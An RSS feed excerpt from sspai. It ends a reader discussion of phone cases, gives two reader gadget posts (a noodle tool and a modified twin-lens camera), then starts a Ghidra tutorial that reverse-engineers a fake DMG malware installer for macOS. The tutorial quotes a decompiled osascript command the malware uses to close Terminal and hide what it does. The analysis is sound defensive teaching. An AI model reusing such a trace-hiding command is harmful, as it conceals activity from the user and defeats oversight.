年的爱否全包碳纤维壳（无磁吸），现在在用的是决色的磁吸全包碳纤维壳。轻薄很重要。</p><p><strong>一般会社员 </strong>(+0) iPhone 15 Plus 真的太难买壳了。 目前买了一个图拉斯的支点壳，追求保护性和功能；还买了一个 Benks 的凯夫拉，追求轻薄手感。两个换着用。</p><figure class="image ss-img-wrapper"><img alt="" src="https://cdn.sspai.com/2024/04/15/avatar/f5a3f2520c93e4e0330017f619103c57.png?imageView2/2/w/1120/q/90/interlace/1/ignore-error/1" /></figure><p><strong>xylon </strong>(+0) 14 Pro 已经买过五六款手机壳了 爱否冰糖 AR 磨砂膜：清晰不影响阅读、手感细腻打游戏操作顺滑 elago 鹅卵石磨砂手机壳：唯一一款能找到的弧形壳，也是主要为了舒适，缺点没有 MagSafe Casetify 手机壳：喜欢一些艺术家合作款，缺点厚重，且 MagSafe 环把我手机背部磨出了一个圈… 爱否冰川光栅手机壳，价格优惠手感很棒。</p><p><strong>RyuuHkBh </strong>(+0) 刚买来时会戴壳和膜，后面觉得无所谓了。 但是不戴久了会疏油层被抹掉？感觉很容易沾指纹，就又带上了膜和壳😖😭 还是喜欢薄一点，以及不要沾指纹的吧。</p><p><strong>囧瑟夫的图文避难所 </strong>(+0) 兼顾手感的同时做好色彩搭配吧。 蓝色 iPhone 本身就很挑壳，搭配绿色的 FineWoven 壳提供织物带来的丝滑手感也使得整体色系比较和谐，最后在吸上一个亮黄色的 MagSafe 卡包… 冲突色也有了，正好形成了互补。</p><figure class="image ss-img-wrapper"><img alt="" src="https://cdn.sspai.com/2024/04/13/avatar/4d2dddd2db1dab0677aae961e572fa1d.png?imageView2/2/w/1120/q/90/interlace/1/ignore-error/1" /></figure><p><strong>一杯榛果拿铁 </strong>(+0) 追求轻量化，用的 evutec，手感很好，就是价格太高。</p><figure class="image ss-img-wrapper"><img alt="" src="https://cdn.sspai.com/2024/04/12/avatar/89fb482ec7e00d10f58ac920d22e8706.png?imageView2/2/w/1120/q/90/interlace/1/ignore-error/1" /></figure><p><strong>神楽坂绫奈 Kana </strong>(+0) 必须是精孔、全包、TPU、带个性化图案的软壳，因为这样才能同时能兼顾轻薄手感、防摔、美观以及保护镜头。</p><figure class="image ss-img-wrapper"><img alt="" src="https://cdn.sspai.com/2024/04/11/avatar/708288f66961bb5084d3dee04ab0b8ba.jpeg?imageView2/2/w/1120/q/90/interlace/1/ignore-error/1" /></figure><p><strong>不加柠檬的炸鸡 </strong>(+1) 用了很多年 iPhone，每台手机都会花很多钱买手机壳（和贴膜），去年第一次试着购买了 AC + 并且不搭配手机壳（和贴膜）使用。总的来说有点后悔，虽然是很省心，但是我发现我作为 iPhone 用户的一大乐趣，就是挑选花样繁多的手机壳，然后过一段时间换一个，就有一种换了新手机 / 新心情的感觉。</p><p><strong>noahhhh </strong>(+0) 现在手机都是玻璃后盖，带壳主要是为了防滑，摩擦力大了拿着也会省力很多。</p><p><strong>吃肉的兔子 </strong>(+0) 一般备用 2 个，一个轻盈的，一个是足额防护的，外出游玩一般换足额防护的，在家或者办公场所就换轻盈的</p><p><strong>背帶褲中鋒 </strong>(+0) 每一支 iPhone 都会入官皮跟官透，今年则改成 bellroy 皮革＋官透。</p><p><strong>ROB1N </strong>(+0) iPhone 、Pixel 7 、Apple Watch 我现在都是 spigen 的壳子、表带，主打一个统一性。</p><p><strong>hsiaochi </strong>(+0) 一般就按以下要求买：</p><ul><li>材质：欧缔兰，各种技法的真皮，碳纤维，芳纶纤维</li><li>功能：带尾磁 magsafe，按键清脆，action button 不得开孔，充电口尺寸适中</li><li>保护性：跌落防痕迹</li></ul><p>以前最喜欢的是欧缔兰，冬暖夏凉防滑。现在喜欢真皮，因为官方不卖了。</p><p>近期由于受不了钢化膜和壳的重量，换成水凝膜了，下一步准备买带 MagSafe 的保护性好一点的碳纤壳，这种既要又要的产品大家有推荐的吗？</p><p><strong>自言者一么 imgradeone </strong>(+0) 现在我手上的 Redmi Note 12 Turbo 还是用着原装清水壳，虽然应该也够用了</p><p><strong>Greeny </strong>(+0) Caudabe Sheath，买后就没用过其他手机壳了。</p><figure class="image ss-img-wrapper"><img alt="" src="https://cdn.sspai.com/2024/04/09/d4604e91cbb00b6ddcbcbc59f100da82.jpg?imageView2/2/w/1120/q/90/interlace/1/ignore-error/1" /></figure><p><strong>tzystan </strong>(+0) 华强北的芳纶纤维 600D 磁吸壳 22.x 克超绝手感</p><figure class="image ss-img-wrapper"><img alt="" src="https://cdn.sspai.com/2024/04/10/cb4b9ac9ced5dd034769f10e904ff08b.jpg?imageView2/2/w/1120/q/90/interlace/1/ignore-error/1" /></figure><p>📢：下一期的一派讨论是《<a href="https://sspai.com/bullet/1713257129/" target="_blank">无限/多次回购的速食食品？</a>》，欢迎来聊。</p><h2>作者的新玩意</h2><p>为了让作者的投稿尽快与广大读者见面，我们调整了《新玩意》栏目中作者投稿部分的呈现方式和周期，作者投稿的「新玩意」后续会迁移至本栏目。投稿渠道与奖励方式仍与以往完全一致，详情参见文末。我们相信新鲜火热出炉的分享更能赢得大家的喜爱，也欢迎广大读者朋友们踊跃投稿。</p><h3>@潘誉晗：做麦花汤的厨房神器</h3><ul><li>入手渠道：淘宝</li><li>入手价格：9.8 人民币</li></ul><p>作为一个假的南方人，我对面食，一直有着极为强大的热情。</p><p>我们本地有一种面食叫做「麦花汤」，因为形状有点像长长的虾子，所以也有「麦虾汤」的称法，山西那边，似乎还会用「拔鱼儿」来称呼。这种细细长长的面食不需要揉面，只需要加盐入个底味，然后揉成面糊之后直接下水煮便可。很多人制作麦花会用筷子，而街边老面馆里头那些手艺精湛的老傅们，只凭一把菜刀，就可以拉出长长的麦花来。</p><p>我非常喜欢吃麦花汤，口感筋道，可惜我制作的麦花汤，没办法像老师傅们或者我爸那样，细细长长，反而是一坨一坨的。我练了好几年，但是技术还是不成熟，有的时候觉得自己做得挺好的，但是更多的时候，只能用刀拉出四五公分圆滚滚胖乎乎的麦花。虽然吃起来还是觉得很美味，但是胖胖的扎实口感还是和长长的口感不一样。</p><figure class="image ss-img-wrapper"><img src="https://cdn.sspai.com/2024/04/07/38a384016d090272d99fc0f887bcc0e2.JPG?imageView2/2/w/1120/q/90/interlace/1/ignore-error/1" /><figcaption>训练了很久的麦花汤，已经算比较细长了，但是花了不少时间</figcaption></figure><p>3 月底的时候在淘宝上瞎逛，发现了一个制作山西「拔鱼儿」的神器，于是想着也许拿来做麦花也不错。板 + 剃尖只需要 9.8 人民币，这个价格的话，哪怕不好用也觉得没事了。于是就一个激情下单。</p><figure class="image ss-img-wrapper"><img src="https://cdn.sspai.com/2024/04/07/5f0acc211221d596cf313518fa88f3a9.jpg?imageView2/2/w/1120/q/90/interlace/1/ignore-error/1" /><figcaption>我买的这一家，实惠款只需要 9.8 人民币</figcaption></figure><p>收到货的当天晚上，清洗干净之后我就立刻使用了。截止今天已经十天过去，我做了三次麦花汤，每次都很成功，操作起来也非常方便，以前需要半小时小火的制作，现在开中大火烹饪也安全没事。</p><p>操作方法：</p><p>1、先调制面糊。面粉加少许盐入一个底味，然后加水调成面糊。如果喜欢吃有韧劲的，那就加一点红薯粉。这里的具体比例我没有计算过，面粉比水多，然后直接用筷子搅拌，搅拌成介乎面团和酸奶状之间的面糊就可以，有流动状态但是不是那么液体。</p><figure class="image ss-img-wrapper"><img src="https://cdn.sspai.com/2024/04/07/80d5a46b752448ac697838594032c26e.JPG?imageView2/2/w/1120/q/90/interlace/1/ignore-error/1" /></figure><p>2、把面糊转移到面板上，这里我直接用面板像铲子一样往碗里铲就行。</p><figure class="image ss-img-wrapper"><img src="https://cdn.sspai.com/2024/04/07/b62fb93caeae409226e1d98926268547.JPG?imageView2/2/w/1120/q/90/interlace/1/ignore-error/1" /></figure><p>3、剃尖先沾一下热水，然后直接刮下面糊就行。</p><figure class="image ss-img-wrapper"><img src="https://cdn.sspai.com/2024/04/07/25e3fee4a15ad3962cf4fef19fba9559.JPG?imageView2/2/w/1120/q/90/interlace/1/ignore-error/1" /></figure><p>麦花汤的汤底就任君挑选啦～加入自己喜欢的食材就可以。我一半是先煮一锅蔬菜，然后开中火做麦花，做好了之后加一个荷包蛋（也可以不要）就可～如果喜欢汤头更清澈一点的，可以另外起一锅热水做～</p><figure class="image ss-img-wrapper"><img src="https://cdn.sspai.com/2024/04/07/42d954798c27f182992096659dec74bc.JPG?imageView2/2/w/1120/q/90/interlace/1/ignore-error/1" /><figcaption>现在我调面粉 + 备菜 + 制作，大概 15-20 分钟就可以完成啦～</figcaption></figure><h3>@拐子狼：海鸥双反改拍立得后背</h3><ul><li>入手渠道：某鱼</li><li>入手价格：2008</li></ul><p>胶片之于摄影，就像是自行车之于出行，肯定不如数码相机或汽车方便，但有的风景就是只有它才能带你看到。不过胶片这两年的涨价有目共睹，所以作为新手，我选了一个取巧的折中之道：双反机身搭配拍立得后背（可以当成是自行车改装后的电助力单车？）。</p><figure class="image ss-img-wrapper"><img src="https://cdn.sspai.com/2024/04/09/b58048fc74925ed746a71dcbf0c6ea94.jpg?imageView2/2/w/1120/q/90/interlace/1/ignore-error/1" /></figure><p>拍立得价格虽然也涨得生猛，好在没胶片那么疯，而且出片效果即时可见，对新手熟悉参数是很重要的。倘若经历了漫长等待后发现自己小心翼翼拍摄、送刷的胶片其实被拍废了，说不得就道心受损，再无力苦修这胶片一途。</p><p>整套机器是在某鱼上收的，卖家也是个有趣的人。海鸥 4B + 蒙皮改造 + 拍立得后背，最贵的在人工，拍立得后背如果拿着成品机单独改造，价格在 1200+；蒙皮改装也要收费几百至一千；海鸥双反本体反而最便宜，成色好一点的六百上下足够。</p><figure class="image ss-img-wrapper"><img src="https://cdn.sspai.com/2024/04/09/8aafefc3a63fd3be87ae53a606a86b84.jpg?imageView2/2/w/1120/q/90/interlace/1/ignore-error/1" /><figcaption>前面板已更换了蒙皮</figcaption></figure><p>我研究了几日收旧机翻新、托人改蒙皮和加装拍立得后背的攻略与所需投入后，正好看到有人以两千块的价格出全套，干脆还是入全套好了。这其实是性价比非常高的方案，海鸥在上古遗留的双反中算是存世量大、效果还不错的，改装拍立得更是对画质没那么多要求，拿着哈苏或禄来搭配拍立得反而吕布骑狗牛刀杀鸡了。同时我也没有拍立得设备，一机多用。</p><p>所谓科技进步的过程就是材料劣化的过程。摸惯了现代数码机身上精致的塑料，上古机器的金属触感和古早黄铜味儿果然别有风味。双反有两颗镜头，上面的是取景镜头，下面的是成像镜头。左侧旋钮用来对焦，iso、快门速度、快门、计时器等按钮都在正面。</p><figure class="image ss-img-wrapper"><img src="https://cdn.sspai.com/2024/04/09/da4c890209467f45e0a70eff6e979594.jpg?imageView2/2/w/1120/q/90/interlace/1/ignore-error/1" /><figcaption>侧面是对焦旋钮</figcaption></figure><p>正面还有一处用以连接的闪光灯的阀门，我买了神牛新出的复古闪光灯来搭配它，连线引闪，相得益彰。感觉像是穿越到民国老照相馆。</p><figure class="image ss-img-wrapper"><img src="https://cdn.sspai.com/2024/04/09/32c7623607342846364c4de37e0f935e.jpg?imageView2/2/w/1120/q/90/interlace/1/ignore-error/1" /><figcaption>神牛复古闪光灯</figcaption></figure><p>双反胶片机的取景器是最有摄影仪式感的地方。按下开关，弹出取景屏，在专门的取景镜头的加持下，即便不拍摄也相当有身为摄影师的愉悦感。和数码相机的 evf 取景体验天差地别。</p><p>我尤其喜欢弹出取景器时金属件发出的声音，比现在相机们的电子快门模拟出的机械声正宗多了。</p><figure class="image ss-img-wrapper"><img src="https://cdn.sspai.com/2024/04/09/170cd82bed8b03e9344fb6fcd12dd194.jpeg?imageView2/2/w/1120/q/90/interlace/1/ignore-error/1" /><figcaption>取景才是正经事，按不按快门无所谓</figcaption></figure><p>机身右侧还装有一个摇杆，这是用来给拍立得后背出片用的。这一款使用的是 mini 相纸，再进阶版可以用 wide 相纸并电子出片，不过我不追求画质就没升级。</p><p>正好是春天，带着它拍了拍江南花季。公园里人头攒动，不乏摄影师。也许是太过少见，还真的有人主动询问我拿的是什么。有一次还碰到两位老法师，身上背着两三台相机，手里还扛一台稳定器，看到我很是惊喜，指着海鸥说几十年前自己家里也有一台，我顿时明白了为什么有人说海鸥是老法师扩列神器……</p><figure class="image ss-img-wrapper"><img src="https://cdn.sspai.com/2024/04/09/c8d7d4d9cb3f1f8114d355ce97c09ad4.JPG?imageView2/2/w/1120/q/90/interlace/1/ignore-error/1" /><figcaption>粉色拍立得</figcaption></figure><p>此处列上我为这台海鸥双反准备的配件，如果有同样心动的朋友可以用作参考。</p><p>神牛复古闪光灯 Lux Cadet，购入价 484，还没怎么用过但是好看啊。</p><figure class="image ss-img-wrapper"><img src="https://cdn.sspai.com/2024/04/09/39a9e2e1458cfb622e29121e31192647.jpg?imageView2/2/w/1120/q/90/interlace/1/ignore-error/1" /></figure><p>取景器拍摄手柄，购入价 42，用来翻拍取景器的，不太好用。</p><figure class="image ss-img-wrapper"><img src="https://cdn.sspai.com/2024/04/09/f99e129f4629e49f268c74e9d04308e8.jpeg?imageView2/2/w/1120/q/90/interlace/1/ignore-error/1" /></figure><p>樱花金属快门，购入价 &nbsp;20，原本的快门是裸露的用来接快门线，换一个按钮按着舒服多了。</p><figure class="image ss-img-wrapper"><img src="https://cdn.sspai.com/2024/04/09/ae789cb1511a2cac1dcb1c672a6e919f.JPG?imageView2/2/w/1120/q/90/interlace/1/ignore-error/1" /></figure><p>毛毡板照片墙，购入价 38，贴在工作室里塞满照片很好看。白色边框是打印的相片，粉色边框才是拍立得。不得不说单论画质还是数码相机 + 打印效果最好。</p><figure class="image ss-img-wrapper"><img src="https://cdn.sspai.com/2024/04/09/49548b682fcdb89b01fb0d4e1dd5c9cd.JPG?imageView2/2/w/1120/q/90/interlace/1/ignore-error/1" /></figure><hr /><p><strong>如果你也想分享「新玩意」🔉：</strong></p><ul><li>获取 Matrix 社区写作权限并签署 <a href="https://sspai.com/post/72089" target="_blank">Matrix 共创计划</a>；</li><li>在少数派独家发布一篇文章，在标题中标注「新玩意」前缀；</li><li>用至少 800 字介绍产品，并配上 2-3 张产品的实拍图片；</li><li><strong>在网站个人信息中补充支付宝账号。</strong></li></ul><p>成功入选本栏目还可以得到 108 元的「剁手红包」🧧。如果你有兴趣参与，就赶紧来稿吧！</p><p>&gt; 下载少数派 <a href="https://sspai.com/page/client" target="_blank">客户端</a>、关注 <a href="https://sspai.com/s/J71e" target="_blank">少数派公众号</a>，了解更多的新玩意 🆒</p><p>&gt; 特惠、好用的硬件产品，尽在 <a href="https://shop549593764.taobao.com/?spm=a230r.7195193.1997079397.2.2ddc7e0bPqKQHc" target="_blank">少数派 sspai 官方店铺 </a>🛒</p>
                ]]>
            </content:encoded>
        </item>
        
        <item>
            <id>https://sspai.com/post/87870</id>
            <title>Ghidra 逆向工程实战：看看 macOS 恶意软件动了什么手脚</title>
            <link>https://sspai.com/post/87870</link>
            <guid isPermaLink="false">https://sspai.com/post/87870</guid>
            <pubDate></pubDate>
            <updated>Tue, 16 Apr 2024 07:07:03 GMT</updated>
                
                
            <content:encoded>
                <![CDATA[
                    
                        <div> 关键词: 清明小长假, 恶意软件, 逆向工程, Ghidra
<br>
<br>
总结: 在清明小长假期间，朋友误下载恶意软件，引发了对逆向工程和Ghidra的讨论。逆向工程是对软件内部逻辑进行探索的过程，而Ghidra是一款开源的软件逆向工程工具。恶意软件伪装成DMG文件，通过特殊命令进行挂载，冒险家可以使用魔法放大镜观察文件内部结构。逆向工程和Ghidra的应用可以帮助分析和处理恶意软件。 </div>
                        <hr>
                    
                    <p>在清明小长假的一天，我接到一个朋友的电话。他误下载并执行了一个恶意软件，询问我接下来该怎么办：</p><blockquote><p>我点击安装，弹出了一个终端，我还没有看清终端里的字，它就闪退了。我不信邪，就又点了一次安装....</p></blockquote><p>很好，没救了。听完他的描述，我默默地说「改密码吧，重装系统吧。」</p><p>介于他「死」也要「死」的明白的需求，让我们一起借助 Ghidra 看看一个恶意软件在我们的电脑里都悄悄咪咪做了什么。</p><h2>背景知识引入 📚</h2><p>这里先简单介绍一下逆向工程和 Ghidra。</p><h3>逆向工程 🛠️</h3><p>逆向工程是相对于传统的正向工程来定义的。传统的软件正向工程主要为实现软件开发过程，目标是开发出符合开发者意图的产品供用户使用。</p><p>想象一下，你手里有一台魔法盒子（也就是一款软件），这个盒子能做很多神奇的事情。但是，你不仅仅满足于它能做什么，你还想知道它是怎么做到的。这时候，逆向工程就登场了！</p><p>软件逆向工程的操作对象是各类软件而且是各类已经编译好能够执行的二进制文件，通过逆推软件动态的执行过程来探索软件代码内部逻辑。</p><p>具体来说，逆向工程的对象是那些已经完成并且可以运行的软件程序。你可以把它看作是一本书的最终稿。逆向工程的高手们会试图通过各种技巧，比如「静态反编译」（就像是把书的每一页详细研究一遍，看看作者是如何组织故事的）和「动态调试」（这更像是看书时偶尔翻到书的某个章节，试图理解故事发展的逻辑）来探索这些软件的内部逻辑。</p><h3>Ghidra 🐉</h3><p style="margin-left: 0px;">Ghidra 是由美国国家安全局（NSA）开发并在 2019 年开源的一款软件逆向工程工具。它是一个软件逆向分析框架，包含了一系列的组件和库，用于对编译后的代码进行分析。它的优点有很多：</p><ul><li>开源且免费的（包括其反编译器）</li><li>支持很多处理器架构</li><li>可以在一个项目中同时加载多个二进制文件</li></ul><figure class="image ss-img-wrapper"><img src="https://cdn.sspai.com/2024/04/12/403baefa15482f4cfa6827686c6a308a.png?imageView2/2/w/1120/q/90/interlace/1/ignore-error/1" /></figure><h2>提取恶意软件 ☠️</h2><h3>恶意软件的马甲 👣</h3><p>恶意软件伪装成一个 DMG 格式的文件。当你打开这个文件，里面会弹出一个安装向导，看起来一切都很正常对吧？但别急着点击安装！这个文件是个冒牌货，其实是恶意软件假扮的。如果不小心点击了安装，这个恶意软件就会被激活，它会开始偷偷地干一些坏事 😱。</p><figure class="image ss-img-wrapper"><img src="https://cdn.sspai.com/2024/04/07/ce5d86e06aa5dc1b94cf626c8f0e63e9.gif" /><figcaption>伪装成普通软件的恶意软件</figcaption></figure><h3>冒险者的挂载之旅 🧙</h3><p style="margin-left: 0px;">想象你是一位冒险家，在 Mac 电脑的广阔世界中进行探索。你最近接到的委托是调查一个小偷的犯罪计划书。小偷将这个计划书藏在了一个邪恶宝箱 📦 里。这个宝箱就是本文中的伪装成了 DMG 格式的恶意软件。</p><p style="margin-left: 0px;">首先，你需要使用一种特殊的魔法咒语来打开这个宝箱，这个咒语叫做 <code>hdiutil attach</code>。在你的 Mac 电脑上打开「终端」——这是一个可以让你与电脑深层对话的神奇工具。在终端里，你输入这个咒语，并告诉它你要打开的DMG文件的位置。</p><p style="margin-left: 0px;">当你正确地使用这个咒语后，这个 DMG 文件就像是被魔法打开了，变成了一个新的地方，名叫 <code>/Volumes/AppleApp/</code>。这个地方就是这个 DMG 文件里的内容现在所在的位置，你可以把它想象成一个虚拟的小房间或盒子，你的电脑帮你创建了一个入口，让你可以进入。</p><p style="margin-left: 0px;">接下来，你要使用另一个命令 <code>cd</code> 来走进这个新地方。<code>cd</code> 命令就像是「走到……那里」的意思。在终端中输入 <code>cd /Volumes/AppleApp/</code>，你的电脑就会带你进入这个新创建的地方。</p><p style="margin-left: 0px;">当你进入这个地方后，你会发现里面有一个名叫 <code>AppleApp</code> 的文件。这就像是你在这个虚拟房间中发现了一个标记着名字的盒子。现在，你已经成功地找到了这个盒子，接下来的冒险就是打开它，从它里面取出犯罪计划书。</p><figure class="image ss-img-wrapper"><img src="https://cdn.sspai.com/2024/04/08/0b7991262cf629b31ff6527e388e0b6f.gif" /><figcaption>挂载恶意软件</figcaption></figure><h3 style="margin-left: 0px;">使用魔法放大镜观察 AppleApp 🔍</h3><p style="margin-left: 0px;">面对虚拟房间中这个盒子，冒险家怎么会束手无策呢。你拿出了一把魔法放大镜，对准这个神秘的盒子（也就是我们这里的 AppleApp 文件）时，这把放大镜可以让你看到盒子的内部结构，就像超级英雄电影里的高科技设备一样。使用这把放大镜其实就是在终端中使用了一个叫做 <code>file</code> 的命令，它能帮助你识别出这个文件的「身份」。</p><p style="margin-left: 0px;">当你用这个命令查看 AppleApp 文件时，结果就像是揭开了盒子的秘密。你会发现，这个文件里面藏着两种灵魂或者说两种不同的架构 —— x86_64 和 arm64。这就好比这个犯罪计划书是用双语书写的，一种语言是为老式的 Intel 处理器设计的 Mac 电脑准备的，另一种则是为搭载了 Apple 自家的 M1 芯片或者更新型号的现代 Mac 电脑准备的。</p><pre class="language-shell"><code>AppleApp (for architecture x86_64): Mach-O 64-bit executable x86_64
AppleApp (for architecture arm64): Mach-O 64-bit executable arm64</code></pre><p style="margin-left: 0px;">&nbsp;</p><h3 style="margin-left: 0px;">使用魔法剪刀剪裁出 arm64 架构文件 🪄</h3><p style="margin-left: 0px;">委托人只要求拿到 arm64 架构的犯罪计划书（朋友的电脑是 M1 芯片），因此冒险家拿出一把魔法剪刀 ✂️ 精确地剪出 arm64 部分的文件。在这里，这把剪刀是一个叫做 <code>lipo</code> 的命令。</p><pre class="language-shell"><code>lipo AppleApp -thin arm64 -output AppleApp_arm64</code></pre><p style="margin-left: 0px;">这条命令的意思就是从大文件（AppleApp 文件）中「剪下」 arm64 这一部分，并将它单独保存为一个新的小文件（新文件 AppleApp_arm64）。</p><p style="margin-left: 0px;">现在，你手中有了这份特定犯罪计划书（arm64 架构的文件），但它是被加密过的，接下来的目标是要深入了解它。</p><p style="margin-left: 0px;">作为一名冒险家，你虽然拥有冒险精神，但并不擅长解密。幸运的是，你有一位侦探大师 🕵️ 朋友 。他可以帮助你揭开犯罪计划书（一款名为 AppleApp_arm64 的「恶意软件」的密码）。</p><h3 style="margin-left: 0px;">Ghidra 开启逆向任务 🔑</h3><p style="margin-left: 0px;">好了，你现在就是那名侦探家了。作为一名侦探家，你拥有一个工具箱 🧰 Ghidra。你接收到的侦探任务是解密犯罪计划书（arm64 架构的文件）</p><p style="margin-left: 0px;">首先，你需要为这个侦探任务建立一个新的「案件档案」（项目）。打开 Ghidra，在菜单栏中选择 File &gt; New Project。这就像是在档案柜中开辟了一个新的抽屉，专门用来存放这个新案件的所有证据和分析记录。</p><figure class="image ss-img-wrapper"><img src="https://cdn.sspai.com/2024/04/08/7e1291db0dfbda54e1cd8d6e581ebcfc.png?imageView2/2/w/1120/q/90/interlace/1/ignore-error/1" /><figcaption>创建一个新的 Ghidra 项目</figcaption></figure><p style="margin-left: 0px;">接下来，你需要把这个恶意软件的文件 —— AppleApp_arm64，就像是一份关键的证据——带到这个新建的项目中。在 Ghidra 的菜单栏中选择 File &gt; Import File，然后选择这个文件。这就像是你把一份重要的证据文件正式提交到案件档案中，准备进行深入分析。</p><figure class="image ss-img-wrapper"><img src="https://cdn.sspai.com/2024/04/08/df4825613fdecb2e74d185e2d4440d0c.png?imageView2/2/w/1120/q/90/interlace/1/ignore-error/1" /><figcaption>将需要被逆向的文件导入 Ghidra 项目</figcaption></figure><p style="margin-left: 0px;">当你导入文件后，Ghidra 自动识别出这个文件是一个 64 位架构的小端 AARCH64 可执行二进制文件。这相当于侦探通过初步观察，确认了证据的基本属性和类型。</p><figure class="image ss-img-wrapper"><img src="https://cdn.sspai.com/2024/04/08/a7087385eb2211eccc8951ee6f3a6236.png?imageView2/2/w/1120/q/90/interlace/1/ignore-error/1" /><figcaption>识别恶意软件的架构</figcaption></figure><p style="margin-left: 0px;">到此，这个恶意软件已经成功被导入到 Ghidra 中，就像是证据已经被归档并准备好进行详细分析。接下来，你将使用 Ghidra 的各种工具和视图，就像使用放大镜、指纹粉、和其他侦探工具一样，来详细分析这份证据。你将探索这个恶意软件的内部结构，理解它的工作原理，和寻找任何可能的线索，这将帮助你解开这个软件的秘密，理解它是如何设计来执行恶意活动的。</p><h2 style="margin-left: 0px;">逆向恶意软件 🔦</h2><h3 style="margin-left: 0px;">Ghidra 窗口介绍 🖊️</h3><p style="margin-left: 0px;">我们首先来认识一下 Ghidra 的各种视图窗口。</p><figure class="image ss-img-wrapper"><img src="https://cdn.sspai.com/2024/04/13/6a01270fa5a8224360d78aa3f268a1cb.png?imageView2/2/w/1120/q/90/interlace/1/ignore-error/1" /></figure><p style="margin-left: 0px;">编号 1 对应<strong>反汇编视图</strong>：这就像是侦探的放大镜。它帮助我们查看证据的最基本细节，即使这些细节是用一种非常技术性的语言（汇编语言）表达的。正如放大镜能让侦探看清楚微小的线索一样，反汇编视图让我们看清楚程序的基础操作。</p><p style="margin-left: 0px;">窗口 2 对应<strong>反编译器视图</strong>：这可以比作是翻译器或解码器。当侦探拿到一封用密码写的信时，需要一个工具来将其翻译成易懂的语言。反编译器视图正是将复杂的汇编代码「翻译」成更易理解的高级编程语言，如 C/C++或Java。</p><p style="margin-left: 0px;">窗口 3 对应<strong>程序树</strong>：这类似于侦探的案件文件夹，其中详细记录了案件的各个方面。程序树为我们提供了程序的结构概览，帮助我们快速定位到感兴趣的代码段或功能模块，就像侦探翻查文件夹找到相关证据一样。</p><p style="margin-left: 0px;">窗口 4 对应<strong>符号树</strong>：这就像是侦探的索引卡片系统。每张卡片上都记录了关键信息，如嫌疑人、地点和证据等。在软件中，符号树帮助我们快速了解程序中的函数、变量和其他元素，使我们能够迅速找到需要深入调查的部分。</p><p style="margin-left: 0px;">窗口 5 对应<strong>数据管理器</strong>：这可以看作是侦探的证据分类工具。它帮助侦探管理和分类不同类型的证据，确保每件证据都能在调查中发挥作用。在软件逆向工程中，数据管理器帮助我们理解和管理不同的数据类型。</p><p style="margin-left: 0px;">窗口 6 对应<strong>脚本的输出窗口</strong>：这就像是侦探的实验室，侦探可以在这里测试不同的假设和理论，看看哪些能够帮助解决案件。在软件逆向工程中，通过编写和运行脚本，我们可以测试和修改软件的行为，寻找解决问题的新方法。</p><p style="margin-left: 0px;">每个工具都为侦探（或逆向工程师）提供了解开复杂谜题所需的关键功能。</p><h3 style="margin-left: !important;">入口点函数 📍</h3><p style="margin-left: !important;">如果把软件比作一部机器，那么「功能」就像是机器可以做的事情，比如「洗衣机可以洗衣服、烘干衣服」，而「函数」就像是机器内部的各个部件，每个部件负责机器的一个具体操作，比如「水泵帮助注水，电机帮助旋转」。没有这些部件（函数）的协调工作，机器（软件）就无法完成任何功能。</p><p style="margin-left: !important;"><strong>一个机器最重要的部件是「开关」或者说「启动按钮」</strong>。同样的，<strong>软件中最重要的函数是「入口点函数」</strong>。</p><p style="margin-left: !important;">如果你有一个洗衣机，你需要按下「启动按钮」来开始洗衣流程。同样地，在软件中，「入口点函数」就像是告诉计算机「从这里开始执行这个软件」。这个函数通常会进行一些初始化设置，然后调用其他函数来执行软件的具体任务，最终实现软件的整体功能。在很多编程语言中，这个函数通常是名为 <code>main</code> 或者<code>entry</code>的函数。</p><p style="margin-left: 0px;">如果你是一个工程师，想要了解这台洗衣机的内部结构和工作原理，你会从「启动按钮」开始。一旦你按下这个按钮，你可以观察洗衣机启动后做了什么：它首先是注水，然后开始转动滚筒，加热水，最后排水和烘干。</p><p style="margin-left: 0px;">同样，在软件逆向工程中，「入口点函数」就像是这个「启动按钮」。通过找到并分析这个函数，逆向工程师可以看到软件启动后首先做了什么，然后跟踪调用了哪些其他函数，这些函数又做了什么。这有助于逆向工程师理解软件的整体结构和各个部分是如何协作的，就像分析洗衣程序的各个步骤一样。</p><p>回到我们的逆向任务里，在 Symbol Tree 中的 Function 中查找 <code>entry</code> 函数，这是入口点函数。</p><figure class="image ss-img-wrapper"><img src="https://cdn.sspai.com/2024/04/08/5607de09e939a3ae0e5c41d2e1f01863.png?imageView2/2/w/1120/q/90/interlace/1/ignore-error/1" /><figcaption>寻找入口点函数</figcaption></figure><p>其对应的反编译代码如下所示。为了方便阅读，我已经对其中一些变量进行重命名，并对关键语句进行注释。</p><figure class="image ss-img-wrapper"><img src="https://cdn.sspai.com/2024/04/13/922382f6dc2cea1e3a30504fb6f9cd91.png?imageView2/2/w/1120/q/90/interlace/1/ignore-error/1" /></figure><p>只要具备一些 C/C++ 背景，这段代码是非常好懂的。其中</p><pre class="language-null"><code>"osascript -e \'tell application \"Terminal\" to close first window\' &amp; exit"</code></pre><p>非常具有恶意软件的反派气质 🦹。<strong>很多恶意软件通过关闭终端来隐藏其活动或清理其痕迹</strong>。</p><p>这段代码的主要目的有两点：</p><ul><li>在子进程中关闭「终端」（Terminal）的第一个窗口以隐藏其行为</li><li>在子进程中创建一个新线程来执行恶意任务（由 <code>malTask</code> 函数实现）</li></ul><h3>恶意流程 🧿</h3><p>Ghidra 为我们呈现出来的&nbsp;<code> malTask</code> 如下所示：</p><figure class="image ss-img-wrapper"><img src="https://cdn.sspai.com/2024/04/12/9803f87fb50bb43498767acca6491e26.gif" /><figcaption>原始 MalTask 函数</figcaption></figure><p>其中有四个名称非常长的函数：</p><pre class="language-null"><code>__Z10hex_decodePKc
__ZNKSt3__112basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEE20__throw_length_errorEv(&amp;local_48);
__ZNSt3__1plIcNS_11char_traitsIcEENS_9allocatorIcEEEENS_12basic_stringIT_T0_T1_EEPKS6_RKS9_(&amp;local_78,"osascript -e \'",&amp;local_48);
__ZNKSt3__112basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEE20__throw_length_errorEv(&amp;local_60);
